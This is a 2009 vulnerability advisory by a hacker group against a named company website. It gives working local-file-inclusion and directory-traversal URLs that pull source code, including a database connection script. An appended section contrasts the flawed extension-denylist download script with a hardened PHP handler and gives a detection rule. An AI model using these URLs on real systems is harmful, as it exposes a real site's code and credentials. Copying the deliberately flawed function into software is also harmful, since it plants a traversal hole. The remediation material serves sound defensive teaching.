==============================================================
===================[¦¦¦¦TeamQuarantine¦¦¦¦]===================
=====================[¦¦¦¦ 7-15-2009 ¦¦¦¦]====================
============[¦¦¦¦TeamQuarantine@hushmail.com¦¦¦¦]=============
===============[¦¦¦¦ Author: St00pidMnky ¦¦¦¦]================
==============================================================
===============[¦¦¦¦ http://www.vopak.com ¦¦¦¦]===============
============[¦¦¦¦ LFI/Source Code Disclosure ¦¦¦¦]============
==============================================================
==============================================================

www.vopak.com suffers from a source code disclosure vulnerability as well as
a Local File Inclusion vulnerability when calling files with download.php

==============================================================
======================[¦¦¦¦ USAGE: ¦¦¦¦]======================
==============================================================

Vulnerable: download.php?file=

download.php can be used to call almost any file on the webserver.

Example:
http://www.vopak.com/media/download.php?file=download.php

Even more frightening:
http://www.vopak.com/media/download.php?file=../scripts/cls_dataConnect.php

==============================================================
====================[¦¦¦¦ FINAL WORD ¦¦¦¦]====================
==============================================================

Take this as a prime example of how NOT to code your file download scripts.
This script even went as far as to prevent certain extensions (mp3) from being
downloaded, but failed to foresee the event of someone traversing directories or
including a .php extension. tsk-tsk

==============================================================
======================[¦¦¦¦ SHOUTZ ¦¦¦¦]======================
==============================================================

Everyone at TeamQuarantine! Gm0, Eolas_Gadai
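The pattern the FINAL WORD describes (an extension denylist with no path confinement) next to a hardened download handler. This is an added example written for this page; it is not vopak.com's download.php, which the advisory does not reproduce. The download directory /var/www/downloads, the allowed-extension list and the function names are assumptions for illustration.

```php
<?php
// Added example, not the site's own script. DOWNLOAD_ROOT is an assumed location.
declare(strict_types=1);

const DOWNLOAD_ROOT = '/var/www/downloads';  // assumed directory of downloadable files

// The flawed "before": a denylist of extensions and nothing else.
// "../" walks out of DOWNLOAD_ROOT and ".php" is not on the list, so
// application source (e.g. a DB connection class) is served back as a download.
function resolve_download_denylist(string $requested): ?string
{
    $blocked = ['mp3'];
    $ext = strtolower(pathinfo($requested, PATHINFO_EXTENSION));
    if (in_array($ext, $blocked, true)) {
        return null;
    }
    return DOWNLOAD_ROOT . '/' . $requested;   // no canonicalisation, no root check
}

// Hardened version: bare filenames only, an allowlist of types, and a realpath
// check that the resolved file still lies inside DOWNLOAD_ROOT.
function resolve_download_safe(string $requested): ?string
{
    // 1. Reject anything containing a path separator or a NUL byte.
    if ($requested === '' || strpbrk($requested, "/\\\0") !== false) {
        return null;
    }
    // 2. Allowlist the document types we intend to serve; .php is never on it.
    $allowed = ['pdf', 'zip', 'png', 'jpg'];   // assumed list for this example
    $ext = strtolower(pathinfo($requested, PATHINFO_EXTENSION));
    if (!in_array($ext, $allowed, true)) {
        return null;
    }
    // 3. Canonicalise (realpath resolves symlinks and ".." and returns false for
    //    missing files) and confirm the result is still under the root.
    $root = realpath(DOWNLOAD_ROOT);
    $path = realpath(DOWNLOAD_ROOT . '/' . $requested);
    if ($root === false || $path === false
        || strpos($path, $root . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

// Request handling: anything refused gets a plain 404, with no path echoed back.
$requested = (string)($_GET['file'] ?? '');
$path = resolve_download_safe($requested);
if ($path === null || !is_file($path)) {
    http_response_code(404);
    exit;
}
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . basename($path) . '"');
header('Content-Length: ' . (string)filesize($path));
readfile($path);
```

The two checks that matter are the allowlist (a denylist can never enumerate every extension that should not be served) and the realpath prefix comparison, which is what actually stops directory traversal; stripping "../" from the input is not a substitute, since encoded or repeated sequences get past simple string replacement. A practical detection for the same flaw is to alert on download requests whose file parameter contains "../" or ends in .php, .inc or .cfg, since a legitimate client of this script never sends those.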